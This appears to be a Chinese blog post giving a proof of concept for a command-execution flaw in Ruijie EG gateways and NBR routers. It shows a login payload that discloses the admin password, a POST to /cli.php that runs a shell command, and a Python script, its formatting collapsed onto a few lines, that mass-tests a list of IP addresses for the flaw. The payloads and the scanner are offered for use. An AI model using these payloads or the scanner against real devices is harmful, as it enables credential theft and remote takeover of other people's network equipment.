文章目录

  • 1、获取密码
  • 2、登陆后台RCE
  • 3、poc脚本

前言:关于锐捷EG易网关与NBR路由器的命令执行漏洞

1、获取密码

poc:

username=admin&password=pass?show webmaster user

2、登陆后台RCE

前提:成功登陆后台
poc:

POST /cli.php?a=shellnotdelay=true&command=whoami

3、poc脚本

随便写了个,比较简单,可以修改
1.txt内容格式就是ip就行,一行一个IP
格式如下:

1.1.1.1
2.2.2.2
3.3.3.3

代码如下

import requests
import logginglogging.captureWarnings(True)  #忽略警告
fopen=open("1.txt",'r')
lines=fopen.readlines()#print(lines)for ip in lines:ip=ip.strip()#print("正在测试"+ip)try:#data = "username=admin&password=admin?show webmaster user"data={'username': 'admin','password':'pass?show webmaster use'}r = requests.post("https://"+ip+":4430/login.php", verify=False,timeout=1,data=data)#print(r.status_code)#print("https://"+ip+":4430/login.php")#print(r.text)if "data" in r.text:print("#################"+ip+"存在锐捷EG易网关命令执行#################")else:print(ip+"不存在锐捷EG易网关命令执行")except:pass


还有遇到的一个锐捷远程代码执行漏洞,点击传送门

锐捷EG易网关与NBR路由器命令执行漏洞-2相关推荐

  1. 锐捷NBR路由器命令执行漏洞复现

    锐捷NBR路由器命令执行漏洞 首先先看看页面的样子 2. 这里需要注意的是,由于权限问题,厂商使用的cookie为用户名密码加密使用,什么意思呢? 经过测试,当密码输入错误的时候,部分型号nbr路由器 ...

  2. 锐捷EG易网关远程命令执行漏洞-1

    文章目录 测试poc payload1-命令执行结果写入文件 payload2-访问写入的文件 简单脚本 这里是在EG易网关中测试出来的,不知NBR路由器是否存在 测试poc /guest_auth/ ...

  3. NETGEAR 系列路由器命令执行漏洞简析

    NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...

  4. 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

    锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执 ...

  5. 锐捷NBR路由器远程命令执行漏洞(CNVD-2021-09650)

    漏洞描述 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限. 漏洞复现 访问锐捷EWEB网管系统界面 使用HackBar执行payload POS ...

  6. 转型 细分 新篇章——2018锐捷睿易全国合作伙伴大会

    1月21日,星城长沙,近500家合作伙伴,600余人齐聚2018锐捷睿易全国合作伙伴大会,与会合作伙伴和参会人数均创历史新高,规模空前. 大会用丰富充实的业绩报告.经验分享.新品体验等带领大家回顾了成 ...

  7. 锐捷睿易RAP100全新上市 WALL AP也有超高性能

    一好友去丽江旅游,打电话抱怨说,终于明白为什么丽江是个充满"艳遇"的地方,因为酒店,KTV,饭店,咖啡厅的无线网络都极差,看不了电脑,玩不了手机-- 的确,无线网络覆盖已经成为人们 ...

  8. 漏洞情报 | 锐捷RSR路由器设备存在命令执行漏洞

    ​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 2021年4月14日,360漏洞云监测到锐捷网络官方通告了锐捷网络RSR路由器系列产品的Web管理存在命令执行漏洞(CNVD-2021 ...

  9. 锐捷 Smartweb管理系统 命令执行漏洞

    锐捷 Smartweb管理系统 0x01 漏洞描述 0x02 漏洞指纹 0x03 漏洞复现 0x01 漏洞描述 锐捷网络是一家拥有包括交换机.路由器.软件.安全防火墙.无线产品.存储等全系列的网络设备 ...

  10. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

最新文章

  1. 操作document对象练习
  2. 设计师学习HTML/CSS之路-13
  3. 飞鸽传书10048错误的解决
  4. HDU3790 最短路径问题【Dijkstra算法】
  5. flink读取不到文件_flink批处理从0到1
  6. Codeforces Round #555 (Div. 3) E. Minimum Array
  7. Git常用命令(持续更新)
  8. 机器学习之数据预处理——降噪
  9. js脚本锁计算机软件,AutoJs解密工具
  10. matlab找零钱,自动售货系统
  11. 一步步用python制作游戏外挂
  12. GPG使用方法总结(密钥管理,加解密文件)
  13. JavaScript实现打字机效果
  14. 日期时间在ios上显示错误
  15. linux awk比较大小,linux基础只是之awk命令使用,统计最大长度
  16. 核典型关联分析(KCCA)算法原理
  17. 关于U盘中毒,文件全变成快捷方式
  18. 计算机四屏故障维修,液晶显示器有哪些常见故障 液晶显示器常见故障及维修方法...
  19. JAVA RSA算法加密实现 eclipse
  20. facebook入华,你了解这些信息吗?

热门文章

  1. 如何将网页另存为PDF
  2. java矩阵连乘算法_矩阵连乘(java实现)
  3. 在linux中PHP的集成环境吗,linux有php集成环境吗
  4. 微信小程序 自定义picker封装成插件实现二级三级四级联动
  5. php简短一句话木马免杀,免杀/一句话木马(PHP)
  6. 2022年制造业单项冠军行业研究报告
  7. Java基础系列1-Java语言概述
  8. 英语学习网站超级大全(转载自豆瓣网)
  9. 现代信号处理——自适应滤波器(离散维纳滤波器)
  10. 【预测模型】基于遗传算法优化最小二乘支持向量机实现数据分类matlab代码